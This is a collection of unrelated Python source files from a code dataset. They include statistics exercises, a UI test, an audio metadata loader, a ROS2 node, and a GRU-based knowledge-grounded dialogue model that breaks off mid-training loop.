+{"seq_id":"182828446","text":"# init which do preperation work like check if file is correct format like CSV or XML\nclass MyNum(object):\n\n def __init__(self, value):\n try:\n value = int(value)\n except ValueError:\n print (\"don't use NOT string value like \" +value)\n exit(1)\n self.val = value\n\n def increment(self):\n self.val = self.val + 1","sub_path":"trainingClass.py","file_name":"trainingClass.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"510751430","text":"## 2. Calculating differences ##\n\nfemale_diff = (10771-16280.5)/16280.5\n\nmale_diff = (21790-16280.5)/16280.5\n\n## 3. Updating the formula ##\n\nfemale_diff = (10771-16280.5)**2 / 16280.5\nmale_diff = (21790-16280.5)**2 / 16280.5\ngender_chisq = female_diff+male_diff\n\n## 4. Generating a distribution ##\n\nchi_squared_values = []\n\nfor i in range(1000):\n Uvec = numpy.random.random((32561,))\n Uvec[Uvec < .5] = 0\n Uvec[Uvec >= .5] = 1\n male_count = len(Uvec[Uvec==0])\n female_count = len(Uvec[Uvec==1])\n male_diff = (male_count-16280.5)**2 / 16280.5\n female_diff = (female_count-16280.5)**2 / 16280.5\n chi_squared = male_diff+female_diff\n chi_squared_values.append(chi_squared)\n\nplt.hist(chi_squared_values)\n \n\n## 6. Smaller samples ##\n\nfemale_diff = (107.71-162.805)**2 / 162.805\nmale_diff = (217.90-162.805)**2 / 162.805\ngender_chisq = male_diff+female_diff\n\n## 7. Sampling distribution equality ##\n\nchi_squared_values = []\n\nfor i in range(1000):\n Uvec = numpy.random.random((300,))\n Uvec[Uvec<.5] = 0\n Uvec[Uvec>=.5] = 1\n male_count = len(Uvec[Uvec==0])\n female_count = len(Uvec[Uvec==1])\n male_diff = (male_count-150)**2 / 150\n female_diff = (female_count-150)**2 / 150\n chi_squared = male_diff+female_diff\n chi_squared_values.append(chi_squared)\n \nplt.hist(chi_squared_values)\n\n## 9. Increasing degrees of freedom ##\n\ndiffs = []\nobserved = [27816, 3124, 1039, 311, 271]\nexpected = [26146.5, 3939.9, 944.3, 260.5, 1269.8]\n\nfor i, obs in enumerate(observed):\n exp = expected[i]\n diff = (obs - exp) ** 2 / exp\n diffs.append(diff)\n \nrace_chisq = sum(diffs)\n\n## 10. Using SciPy ##\n\nfrom scipy.stats import chisquare\nimport numpy as np\n\nrace_obs = np.array([27816, 3124, 1039, 311, 271])\nrace_exp = np.array([26146.5, 3939.9, 944.3, 260.5, 1269.8])\n\nchisquare_value, race_pvalue = chisquare(race_obs,race_exp)","sub_path":"DataQuestArchive/probability-statistics-intermediate/Chi-squared tests-99.py","file_name":"Chi-squared tests-99.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"208301714","text":"\ndescription = 'Verify the user can rename a suite'\n\npages = ['login',\n 'index',\n 'project_suites']\n\ndef setup(data):\n navigate(data.env.url)\n login.do_login('admin', 'admin')\n index.create_access_project('test_rename')\n\ndef test(data):\n store('suite_name', 'suite_' + random('cccc'))\n store('new_suite_name', data.suite_name + '_rename')\n project_suites.add_suite(data.suite_name)\n project_suites.verify_suite_exists(data.suite_name)\n project_suites.rename_suite(data.suite_name, data.new_suite_name)\n project_suites.verify_suite_exists(data.new_suite_name)\n\n\ndef teardown(data):\n close()\n","sub_path":"projects/golem/tests/project_suites/rename_suite.py","file_name":"rename_suite.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"23643032","text":"import random\ndef tree_structure(baumtyp):\n baumstruktur = random.randint(1,2)\n if baumtyp == \"eiche\":\n if baumstruktur == 1:\n height = 3\n for y in range(1,height+1):\n yield (0,y,0), \"HOLZ\"\n for x in range(-2,3):\n for z in range(-2,3):\n yield (x,1+height,z), \"LAUB\"\n for x in range(-1,2):\n for z in range(-1,2):\n yield (x,y+height-1,z), \"LAUB\"\n elif baumstruktur == 2:\n height = 5\n for y in range(1,height):\n yield (0,y,0), \"HOLZ\"\n for x in range(-2,3):\n for z in range(-2,3):\n for y in range(2):\n yield (x,y+height,z), \"LAUB\"\n for x in range(-1,2):\n for z in range(-1,2):\n yield (x,y+height+1,z), \"LAUB\"\n \n #if 0 <= y-chunkpos[1] < chunksize\n","sub_path":"resources/Welten/structures/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99536391","text":"import sys, os, wx, time, winsound, re\nimport multiprocessing\nimport copy\nimport globalVars\nfrom views import mkProgress\n\ndef is64Bit():\n\treturn sys.maxsize > 2 ** 32\n\n#使用環境に応じて適切なdllをロード\nif is64Bit():\n\tfrom pybass64 import pybass\n\tfrom pybass64 import pytags\nelse:\n\tfrom pybass import pybass\n\tfrom pybass import pytags\n\nclass dataDict():\n\tdef __init__ (self):\n\t\t# dataNo:(ファイルパス, ファイル名, サイズ, タイトル, 長さ, アーティスト, アルバム, アルバムアーティスト)\n\t\tself.dict = {}\n\t\tself.dataNo = 0\n\t# 複数ファイルを追加(ファイルパスリスト, 追加先リスト, 対応するリストビュー, 追加先インデックス=末尾)\n\tdef addFiles(self, flst, lst, lcObj, id=-1):\n\t\twx.CallAfter(self.addFilesCall, flst,lst,lcObj,id)\n\n\t#ファイル追加(ファイルパスリスト, 追加先リスト, リストビュー, 追加先インデックス=末尾)\n\tdef addFilesCall(self, flst, lst, lcObj, id=-1):\n\t\t#プログレスダイアログ作成\n\t\tprogress=mkProgress.Dialog()\n\t\tprogress.Initialize(_(\"ファイルを集めています...\"), _(\"読み込み中...\"))\n\t\tprogress.Show(False)\n\t\tglobalVars.app.Yield()\n\t\t# 作業するファイルのリスト(ファイルパス)\n\t\tpathList = []\n\t\t# リストで受け取ってフォルダとファイルに分ける\n\t\tfor s in flst:\n\t\t\tif os.path.isfile(s) == True or re.search(\"^https?://.+\\..+\", s)!=None:\n\t\t\t\tpathList.append(s)\n\t\t\telse:\n\t\t\t\tself.appendDirList(pathList, s)\n\t\t# 作成したファイルパスのリストから辞書に追加\n\t\tself.appendDict(pathList, lst, lcObj, progress, id)\n\t\tprogress.Destroy()\n\t\twinsound.Beep(3000, 100)\n\t\twinsound.Beep(4000, 100)\n\t\twinsound.Beep(5000, 100)\n\n\n\t# ディレクトリパスからファイルリストを取得(ファイルパスリスト, ディレクトリパス)\n\tdef appendDirList(self, lst, dir):\n\t\t# ボトムアップで探索\n\t\tdirObj = os.walk(dir, False)\n\t\tfor tp in dirObj:\n\t\t\tif len(tp[2]) != 0:\n\t\t\t\tfor file in tp[2]:\n\t\t\t\t\tf = tp[0] + \"\\\\\" + file\n\t\t\t\t\tlst.append(f)\n\n\t# 辞書作成\n\tdef appendDict(self, paths, lst, lcObj, progress, id):\n\t\tif len(paths) == 0: return\n\t\tif id == -1: index =lcObj.GetItemCount() - 1\n\t\taddedItemCount = 0\n\t\titemCount = len(paths)\n\t\t#リストを分割\n\t\tsplit = itemCount // 1000\n\t\tpathGroup = [] #分割したリスト\n\t\tfor i in range(0, split+1):\n\t\t\tif i == split:\n\t\t\t\tpathGroup.append(paths[i*1000:])\n\t\t\telse:\n\t\t\t\tpathGroup.append(paths[i*1000:(i+1)*1000])\n\n\t\tpl = multiprocessing.Pool()\n\t\tresult = [] #結果を入れるリスト\n\t\tfor path in pathGroup:\n\t\t\tresult.append(pl.apply_async(getFileInfoProcess, (path,)))\n\n\t\tfor o in result:\n\t\t\twhile o.ready() == False:\n\t\t\t\ttime.sleep(1)\n\t\t\tinfos = o.get()\n\t\t\tfor info in infos:\n\t\t\t\t# 辞書とリストに書き込んでdataNoに+1\n\t\t\t\tif info == None:\n\t\t\t\t\titemCount -= 1\n\t\t\t\t\tcontinue\n\t\t\t\tself.dict[self.dataNo] = copy.deepcopy(info)\n\t\t\t\tlabel = self.dict[self.dataNo][3]\n\t\t\t\tif label == \"\": label = self.dict[self.dataNo][1]\n\t\t\t\tif id == -1:\n\t\t\t\t\tlst.appendF((self.dict[self.dataNo][0], self.dataNo))\n\t\t\t\t\tindex = lcObj.Append([label])\n\t\t\t\telse:\n\t\t\t\t\tindex = id+addedItemCount\n\t\t\t\t\tlst.addF(index, (self.dict[self.dataNo][0], self.dataNo))\n\t\t\t\t\tlcObj.InsertItem(index, label)\n\t\t\t\tlcObj.SetItemData(index, self.dataNo)\n\t\t\t\taddedItemCount += 1\n\t\t\t\tif addedItemCount%10 == 0:\tprogress.update(addedItemCount,_(\"読み込み中\")+\" \"+str(addedItemCount)+\"/\"+str(itemCount),itemCount)\n\t\t\t\tself.dataNo += 1\n\t\t\tglobalVars.app.Yield(True) #プログレスダイアログを強制更新\n\t\tpl.close() #マルチプロセス終了\n\n\ndef getFileInfoProcess(paths):\n\tpybass.BASS_Init(0, 44100, 0, 0, 0)\n\tpytags.TAGS_SetUTF8(True)\n\t#必要なプラグインを適用\n\tpybass.BASS_PluginLoad(b\"basshls.dll\", 0)\n\trtn = []\n\tfor path in paths:\n\t\thandle = pybass.BASS_StreamCreateFile(False, path, 0, 0, pybass.BASS_UNICODE)\n\t\tif handle == 0:\n\t\t\thandle = pybass.BASS_StreamCreateURL(path.encode(), 0, 0, 0, 0)\n\t\t\tif handle == 0:\n\t\t\t\tcontinue\n\t\t# ファイル情報取得\n\t\tfName = os.path.basename(path)\n\t\tif os.path.isfile(path):\n\t\t\tsize = os.path.getsize(path)\n\t\telse:\n\t\t\tsize = 0\n\t\ttitle = pytags.TAGS_Read(handle, b\"%TITL\").decode(\"utf-8\")\n\t\tlengthb = pybass.BASS_ChannelGetLength(handle, pybass.BASS_POS_BYTE)\n\t\tlength = pybass.BASS_ChannelBytes2Seconds(handle, lengthb)\n\t\tartist = pytags.TAGS_Read(handle, b\"%ARTI\").decode(\"utf-8\")\n\t\talbum = pytags.TAGS_Read(handle, b\"%ALBM\").decode(\"utf-8\")\n\t\talbumArtist = pytags.TAGS_Read(handle, b\"%AART\").decode(\"utf-8\")\n\t\tpybass.BASS_StreamFree(handle)\n\t\trtn.append((path, fName, size, title, length, artist, album, albumArtist))\n\tpybass.BASS_Free()\n\treturn tuple(rtn)\n","sub_path":"data_dict.py","file_name":"data_dict.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326400713","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"setup.py: setuptools control.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nfiles = [\"*\"]\n\nsetup(\n name='iqa-one',\n version='0.1.1',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n license='Apache 2.0',\n description='Messaging testing project',\n setup_requires=['pytest-runner'],\n tests_require=['pytest', 'mock', 'pytest-mock'],\n install_requires=[\n 'ansible',\n 'python-qpid-proton',\n 'amqcfg',\n 'dpath',\n 'optconstruct',\n 'docker',\n 'urllib3',\n 'kubernetes'\n ],\n url='https://github.com/enkeys/iqa-one',\n author='Dominik Lenoch',\n author_email='dlenoch@redhat.com'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"318693080","text":"#!/usr/bin/env python3\nimport rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import Bool\nfrom geometry_msgs.msg import Wrench\n\nclass WrenchSubPub(Node):\n\n def __init__(self):\n super().__init__('wrench_pub')\n self.isUp = True\n self.publisher_ = self.create_publisher(Wrench, '/catcher_force', 10)\n timer_period = 0.1 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n self.subscription = self.create_subscription(Bool,'/catcher_up', self.listener_callback,10)\n\n def listener_callback(self, msg):\n self.isUp = msg.data\n\n def timer_callback(self):\n msg = Wrench()\n msg.force.x = 0.0\n msg.force.y = 0.0\n msg.force.z = (60. * (float)(self.isUp == True)) + (-120.0 * (float)(self.isUp == False))\n msg.torque.x = 0.0\n msg.torque.y = 0.0\n msg.torque.z = 0.0\n self.publisher_.publish(msg)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n node_ = WrenchSubPub()\n rclpy.spin(node_)\n\n node_.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()","sub_path":"catcher_control/catcher_control/ctrl.py","file_name":"ctrl.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"479116230","text":"# -*- encoding: utf-8 -*-\r\n#'''\r\n#@file_name :network.py\r\n#@description :\r\n#@time :2020/02/13 12:47:27\r\n#@author :Cindy, xd Zhang \r\n#@version :0.1\r\n#'''\r\nimport torch\r\nimport time\r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom transformer_sublayers import *\r\nfrom torch.nn.utils.rnn import pad_sequence\r\nfrom utils import *\r\nGlobal_device=\"cpu\"\r\nMAX_LENGTH=500\r\nWORD_EMBEDDING_DIM_NO_PRETRAIN=25\r\ndef save_checkpoint(handeler):\r\n epoch,start_iteration,emb,encoder,decoder,optimizer,config=handeler\r\n if config.model_type ==\"gru\":\r\n save_directory = os.path.join(config.save_model_path,config.model_type,'L{}_H{}_'.format(config.n_layers,config.hidden_size)+config.attn)\r\n if not os.path.exists(save_directory):\r\n os.makedirs(save_directory)\r\n save_path= os.path.join(save_directory,'Epo_{:0>2d}_iter_{:0>6d}.tar'.format(epoch,start_iteration))\r\n torch.save({\r\n 'epoch': epoch,\r\n 'iteration': start_iteration,\r\n 'type':str(config.model_type),\r\n 'emb':emb.state_dict(),\r\n 'en': encoder.state_dict(),\r\n 'de': decoder.state_dict(),\r\n 'opt': optimizer.state_dict(),\r\n }, save_path)\r\n elif config.model_type ==\"trans\":\r\n pass\r\n # save_directory = os.path.join(config.save_model_path,config.model_type,'L{}_H{}'.format(config.n_layers,config.hidden_size))\r\n # if not os.path.exists(save_directory):\r\n # os.makedirs(save_directory)\r\n # save_path= os.path.join(save_directory,'Epo_{:0>2d}_iter_{:0>6d}.tar'.format(epoch,start_iteration))\r\n # torch.save({\r\n # 'epoch': epoch,\r\n # 'iteration': start_iteration,\r\n # 'type':str(config.model_type),\r\n # 'en': encoder.state_dict(),\r\n # 'de': decoder.state_dict(),\r\n # 'en_opt': encoder_optimizer.state_dict(),\r\n # 'de_opt': decoder_optimizer.state_dict(),\r\n # }, save_path) \r\n#=========================GRU seq2seq=================================\r\nclass EncoderRNN_noKG(nn.Module):\r\n def __init__(self, hidden_size, embedding_size, n_layers=1, dropout=0):\r\n super(EncoderRNN_noKG, self).__init__()\r\n self.n_layers = n_layers\r\n self.hidden_size = hidden_size\r\n self.gru_History = nn.GRU(embedding_size, hidden_size, n_layers,\r\n dropout=(0 if n_layers == 1 else dropout), bidirectional=True,batch_first =False)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0_reverse)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0_reverse)\r\n # hidden_kg=( num_layers * num_directions, batch,hidden_size)\r\n # batch first 只影响output 不影响hidden的形状 所以batch first=false格式更统一\r\n # self.W1=torch.nn.Linear(self.hidden_size*2, self.hidden_size, bias=True)\r\n # self.PReLU1=torch.nn.PReLU()\r\n\r\n def forward(self, input_history_seq_embedded,input_history_lengths,input_kg_seq,input_kg_lengths, unsort_idxs):\r\n unsort_idx_history,unsort_idx_kg=unsort_idxs\r\n #history\r\n # input_history_seq_embedded = self.embedding(input_history_seq)\r\n input_history_seq_packed = torch.nn.utils.rnn.pack_padded_sequence(input_history_seq_embedded, input_history_lengths,batch_first=False)\r\n his_outputs, hidden_his= self.gru_History(input_history_seq_packed, None)\r\n his_outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(his_outputs,batch_first=False)\r\n his_outputs=his_outputs.index_select(1,unsort_idx_history)\r\n hidden_his=hidden_his.index_select(1,unsort_idx_history)\r\n his_outputs = his_outputs[:, :, :self.hidden_size] + his_outputs[:, : ,self.hidden_size:] # Sum bidirectional outputs (batch, 1, hidden)\r\n return his_outputs, hidden_his\r\nclass EncoderRNN(nn.Module):\r\n def __init__(self, hidden_size, embedding_size, n_layers=1, dropout=0):\r\n super(EncoderRNN, self).__init__()\r\n self.n_layers = n_layers\r\n self.hidden_size = hidden_size\r\n self.dropout = nn.Dropout(p=dropout)\r\n self.gru_KG = nn.GRU(embedding_size, hidden_size, n_layers,\r\n dropout=(0 if n_layers == 1 else dropout), bidirectional=True,batch_first =False)\r\n self.gru_History = nn.GRU(embedding_size, hidden_size, n_layers,\r\n dropout=(0 if n_layers == 1 else dropout), bidirectional=True,batch_first =False)\r\n torch.nn.init.orthogonal_( self.gru_KG.weight_hh_l0)\r\n torch.nn.init.orthogonal_( self.gru_KG.weight_hh_l0_reverse)\r\n torch.nn.init.orthogonal_( self.gru_KG.weight_ih_l0)\r\n torch.nn.init.orthogonal_( self.gru_KG.weight_ih_l0_reverse)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0_reverse)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0)\r\n torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0_reverse)\r\n #GRU的 output: (seq_len, batch, hidden*n_dir) ,\r\n # hidden_kg=( num_layers * num_directions, batch,hidden_size)\r\n # batch first 只影响output 不影响hidden的形状 所以batch first=false格式更统一\r\n self.W1=torch.nn.Linear(self.hidden_size*2, self.hidden_size, bias=True)\r\n self.W2=torch.nn.Linear(self.hidden_size, self.hidden_size, bias=True)\r\n # self.PReLU1=torch.nn.PReLU()\r\n # self.PReLU2=torch.nn.PReLU()\r\n\r\n def forward(self, input_history_seq,input_history_lengths,input_kg_seq,input_kg_lengths, unsort_idxs):\r\n unsort_idx_history,unsort_idx_kg=unsort_idxs\r\n #kg\r\n #input_kg_seq_embedded [seq,batchsize, embeddingsize]\r\n # input_kg_seq_embedded = self.embedding(input_kg_seq)\r\n # input_kg_seq_embedded = input_kg_seq\r\n #【seq*batch*embed_dim】\r\n input_kg_seq= self.dropout(input_kg_seq)\r\n input_kg_seq_packed = torch.nn.utils.rnn.pack_padded_sequence(input_kg_seq, input_kg_lengths,batch_first=False)\r\n #GRU的 output: (seq_len, batch, hidden*n_dir) ,\r\n # hidden_kg=( num_layers * num_directions, batch,hidden_size)\r\n kg_outputs,hidden_kg=self.gru_KG(input_kg_seq_packed, None) \r\n kg_outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(kg_outputs,batch_first=False )\r\n kg_outputs=kg_outputs.index_select(1,unsort_idx_kg)\r\n hidden_kg=hidden_kg.index_select(1,unsort_idx_kg)\r\n\r\n \r\n kg_outputs = kg_outputs[:, :, :self.hidden_size] + kg_outputs[:, : ,self.hidden_size:] # Sum bidirectional outputs ( batch,1, hidden)\r\n \r\n #history\r\n # input_history_seq_embedded=input_history_seq\r\n # input_history_seq_embedded = self.embedding(input_history_seq)\r\n input_history_seq_packed = torch.nn.utils.rnn.pack_padded_sequence(input_history_seq, input_history_lengths,batch_first=False)\r\n his_outputs, hidden_his= self.gru_History(input_history_seq_packed, None)\r\n his_outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(his_outputs,batch_first=False)\r\n his_outputs=his_outputs.index_select(1,unsort_idx_history)\r\n hidden_his=hidden_his.index_select(1,unsort_idx_history)\r\n his_outputs = his_outputs[:, :, :self.hidden_size] + his_outputs[:, : ,self.hidden_size:] # Sum bidirectional outputs (batch, 1, hidden)\r\n # hidden_kg=(num_layers * num_directions,batch, hidden_size)\r\n # concat_hidden=torch.cat((hidden_his, hidden_kg),1).reshape(self.n_layers*2,-1, self.hidden_size*2)\r\n # hidden=self.W1(concat_hidden)\r\n # outputs=self.W2(torch.cat((his_outputs, kg_outputs), 0))\r\n return his_outputs, hidden_his,kg_outputs,hidden_kg\r\nclass Attn(nn.Module):\r\n def __init__(self, method, hidden_size):\r\n super(Attn, self).__init__()\r\n\r\n self.method = method\r\n self.hidden_size = hidden_size\r\n\r\n if self.method == 'general':\r\n self.attn = nn.Linear(self.hidden_size, hidden_size)\r\n\r\n elif self.method == 'concat':\r\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\r\n self.v = nn.Parameter(torch.FloatTensor(1, hidden_size))\r\n\r\n def forward(self, hidden, encoder_outputs):\r\n # hidden [1, 64, 512], encoder_outputs [14, 64, 512]\r\n max_len = encoder_outputs.size(0)\r\n batch_size = encoder_outputs.size(1)\r\n\r\n # Create variable to store attention energies\r\n attn_energies = torch.zeros(batch_size, max_len) # B x S\r\n attn_energies = attn_energies.to(Global_device)\r\n\r\n # For each batch of encoder outputs\r\n for b in range(batch_size):\r\n # Calculate energy for each encoder output\r\n for i in range(max_len):\r\n attn_energies[b, i] = self.score(hidden[:, b], encoder_outputs[i, b].unsqueeze(0))\r\n\r\n # Normalize energies to weights in range 0 to 1, resize to 1 x B x S\r\n return F.softmax(attn_energies, dim=1).unsqueeze(1)\r\n\r\n def score(self, hidden, encoder_output):\r\n # hidden [1, 512], encoder_output [1, 512]\r\n if self.method == 'dot':\r\n energy = hidden.squeeze(0).dot(encoder_output.squeeze(0))\r\n return energy\r\n\r\n elif self.method == 'general':\r\n energy = self.attn(encoder_output)\r\n energy = hidden.squeeze(0).dot(energy.squeeze(0))\r\n return energy\r\n\r\n elif self.method == 'concat':\r\n energy = self.attn(torch.cat((hidden, encoder_output), 1))\r\n energy = self.v.squeeze(0).dot(energy.squeeze(0))\r\n return energy\r\nclass LuongAttnDecoderRNN(nn.Module):\r\n def __init__(self, attn_model,embedding_size, hidden_size, output_size, n_layers=1, dropout=0.1):\r\n super(LuongAttnDecoderRNN, self).__init__()\r\n\r\n # Keep for reference\r\n self.attn_model = attn_model\r\n self.hidden_size = hidden_size\r\n self.output_size = output_size\r\n self.n_layers = n_layers\r\n self.dropout = dropout\r\n # self.embedding_dropout = nn.Dropout(dropout)\r\n self.gru = nn.GRU(embedding_size, hidden_size, n_layers,\\\r\n dropout=(0 if n_layers == 1 else dropout), batch_first=False)\r\n self.gru_kg = nn.GRU(embedding_size, hidden_size, n_layers,\\\r\n dropout=(0 if n_layers == 1 else dropout), batch_first=False)\r\n self.concat = nn.Linear(hidden_size * 2, hidden_size)\r\n self.out = nn.Linear(2*hidden_size, output_size)\r\n\r\n # Choose attention model\r\n if attn_model != 'none':\r\n self.attn = Attn(attn_model, hidden_size)\r\n\r\n def forward(self, input_seq_embedded, last_hidden_his,last_hidden_kg, encoder_outputs):\r\n # Note: we run this one step at a time\r\n # embedded = self.embedding_dropout(embedded) \r\n\r\n # Get current hidden state from input word and last hidden state\r\n #batch_first=True 不影响hidden初始化的格式是(num_layers * num_directions, batch, hidden_size)\r\n rnn_output, hidden = self.gru(input_seq_embedded, last_hidden_his)\r\n rnn_output_kg, hidden_kg = self.gru_kg(input_seq_embedded, last_hidden_kg)\r\n rnn_output_kg = rnn_output_kg.squeeze(0)\r\n \r\n # Calculate attention from current RNN state and all encoder outputs;\r\n # apply to encoder outputs to get weighted average\r\n attn_weights = self.attn(rnn_output, encoder_outputs) #[batchsize, 1, 14]\r\n # encoder_outputs [seq, batchsize, hiddensize]\r\n context = attn_weights.bmm(encoder_outputs.transpose(0, 1)) #[batchsize, 1, hiddensize]\r\n\r\n # Attentional vector using the RNN hidden state and context vector\r\n # concatenated together (Luong eq. 5)\r\n rnn_output = rnn_output.squeeze(0) #[batchsize, hiddensize]\r\n context = context.squeeze(1) #[batchsize4, hiddensize]\r\n concat_input = torch.cat((rnn_output, context), 1) #[64, 1024]\r\n concat_output = torch.tanh(self.concat(concat_input)) #[64, 512]\r\n\r\n # Finally predict next token (Luong eq. 6, without softmax)\r\n output = self.out(torch.cat((concat_output, rnn_output_kg), 1)) #[batchsize, output_size(vocabularysize)]\r\n\r\n # Return final output, hidden state, and attention weights (for visualization)\r\n return output, hidden, attn_weights\r\nclass GRU_Encoder_Decoder(nn.Module):\r\n def __init__(self, config,voc):\r\n super(GRU_Encoder_Decoder, self).__init__()\r\n voc_size=voc.n_words\r\n print('-Building GRU_Encoder_Decoder ...')\r\n self.config=config\r\n WORD_EMBEDDING_DIMs=WORD_EMBEDDING_DIM_PRETRAIN if config.pre_train_embedding==True \\\r\n else WORD_EMBEDDING_DIM_NO_PRETRAIN\r\n self.embedding=nn.Embedding(voc_size, WORD_EMBEDDING_DIMs,padding_idx=PAD_token)\r\n if config.pre_train_embedding==True:self.embedding.weight.data.copy_(torch.from_numpy(\\\r\n build_embedding(voc,config.voc_and_embedding_save_path)))\r\n self.encoder=EncoderRNN(config.hidden_size,WORD_EMBEDDING_DIMs,config.n_layers,config.dropout)\r\n self.decoder=LuongAttnDecoderRNN(config.attn,WORD_EMBEDDING_DIMs, config.hidden_size, voc_size, n_layers=config.n_layers, dropout=config.dropout)\r\n encoder_para = sum([np.prod(list(p.size())) for p in self.encoder.parameters()])\r\n decoder_para = sum([np.prod(list(p.size())) for p in self.decoder.parameters()])\r\n print('Build encoder with params: {:4f}M'.format( encoder_para * 4 / 1000 / 1000))\r\n print('Build decoder with params: {:4f}M'.format( decoder_para * 4 / 1000 / 1000))\r\n #loading\r\n checkpoint =torch.load(config.continue_training,map_location=Global_device) \\\r\n if config.continue_training != \" \" else None\r\n if checkpoint != None:\r\n if checkpoint['type'] !=config.model_type:\r\n raise Exception(\"checkpoint and train model type doesn't match!\")\r\n print('-loading models from checkpoint .....')\r\n self.encoder.load_state_dict(checkpoint['en'])\r\n self.decoder.load_state_dict(checkpoint['de'])\r\n self.embedding.load_state_dict(checkpoint['emb'])\r\n self.checkpoint=checkpoint\r\n self.teacher_forcing_ratio=1\r\n def forward(self, BatchData):\r\n batch_size=self.config.batch_size\r\n history,knowledge,responses=BatchData[\"history\"],BatchData[\"knowledge\"],BatchData[\"response\"]\r\n #log2020.2.23:之前没有发现padding_sort_transform后每个batch内的顺序变了,必须把idx_unsort 也加进来\r\n history,len_history,idx_unsort1 = padding_sort_transform(history)\r\n knowledge,len_knowledge,idx_unsort2 = padding_sort_transform(knowledge)\r\n responses,len_response,idx_unsort3 = padding_sort_transform(responses)\r\n history,idx_unsort1 =history.to(Global_device),idx_unsort1.to(Global_device) \r\n knowledge,idx_unsort2= knowledge.to(Global_device),idx_unsort2.to(Global_device)\r\n responses,idx_unsort3 = responses.to(Global_device),idx_unsort3.to(Global_device)\r\n #encoder_outputs=torch.Size([ 154(seq),2 (batchsize), 512(hiddensize)])\r\n # encoder_hidden=[ (direction*layer),batchsie,hiddensize]\r\n unsort_idxs=(idx_unsort1,idx_unsort2)\r\n history= self.embedding(history)\r\n knowledge= self.embedding(knowledge)\r\n encoder_outputs, encoder_hidden,kg_outputs,hidden_kg = self.encoder(history,len_history,knowledge,len_knowledge,unsort_idxs)\r\n\r\n decoder_input = torch.LongTensor([SOS_token for _ in range(batch_size)]).reshape(1,batch_size) #[batch_size,1]\r\n decoder_input = decoder_input.to(Global_device)\r\n #decoder 不用双向\r\n decoder_hidden = encoder_hidden[:self.decoder.n_layers]\r\n hidden_kg= hidden_kg[:self.decoder.n_layers]\r\n loss=0\r\n MAX_RESPONSE_LENGTH=int(len_response[0].item())-1\r\n responses=responses.index_select(1,idx_unsort3)\r\n use_teacher_forcing = True if random.random() < self.teacher_forcing_ratio else False\r\n if use_teacher_forcing == False :\r\n for t in range(MAX_RESPONSE_LENGTH):\r\n decoder_input= self.embedding(decoder_input)\r\n decoder_output, decoder_hidden, decoder_attn = self.decoder(\r\n decoder_input, decoder_hidden,hidden_kg, encoder_outputs\r\n )\r\n #topi为概率最大词汇的下标\r\n _, topi = decoder_output.topk(1) # [batch_Size, 1]\r\n\r\n decoder_input = torch.LongTensor([topi[i][0] for i in range(batch_size)]).reshape(1,batch_size)\r\n decoder_input = decoder_input.to(Global_device) \r\n # decoder_output=[batch_Size, voc] responses[seq,batchsize]\r\n loss += F.cross_entropy(decoder_output, responses[t+1], ignore_index=EOS_token)\r\n else:\r\n for t in range(MAX_RESPONSE_LENGTH):\r\n decoder_input= self.embedding(decoder_input)\r\n decoder_output, decoder_hidden, decoder_attn = self.decoder(\r\n decoder_input, decoder_hidden, hidden_kg, encoder_outputs\r\n )\r\n decoder_input = responses[t+1].view(1, -1) # Next input is current target\r\n decoder_input = decoder_input.to(Global_device) \r\n loss += F.cross_entropy(decoder_output, responses[t+1], ignore_index=EOS_token)\r\n return loss,MAX_RESPONSE_LENGTH \r\n def train(self, train_loader,dev_loader,optimizer):\r\n print('-Initializing training process...')\r\n start_epoch=1\r\n start_iteration = 1\r\n if self.checkpoint != None:\r\n start_iteration = self.checkpoint['iteration'] +1\r\n start_epoch= self.checkpoint['epoch'] \r\n if start_iteration==int(len(train_loader)//self.config.batch_size)+1:start_epoch+=1\r\n end_epoch=self.config.end_epoch\r\n for epoch_id in range(start_epoch, end_epoch):\r\n iterations,epoch_loss= self.trainIter_gru(epoch_id,start_iteration,train_loader,optimizer) \r\n start_iteration+=iterations\r\n record_train_step(self.config.logfile_path,epoch_id,epoch_loss)\r\n self.dev(epoch_id,dev_loader)\r\n def trainIter_gru(self, epoch,start_iteration,train_loader,optimizer):\r\n self.encoder.train()\r\n self.decoder.train()\r\n self.embedding.train()\r\n stage_total_loss=0\r\n epoch_loss_avg=0\r\n batch_size=self.config.batch_size\r\n self.teacher_forcing_ratio=1/(epoch**(-2))\r\n for batch_idx, data in enumerate(train_loader):\r\n 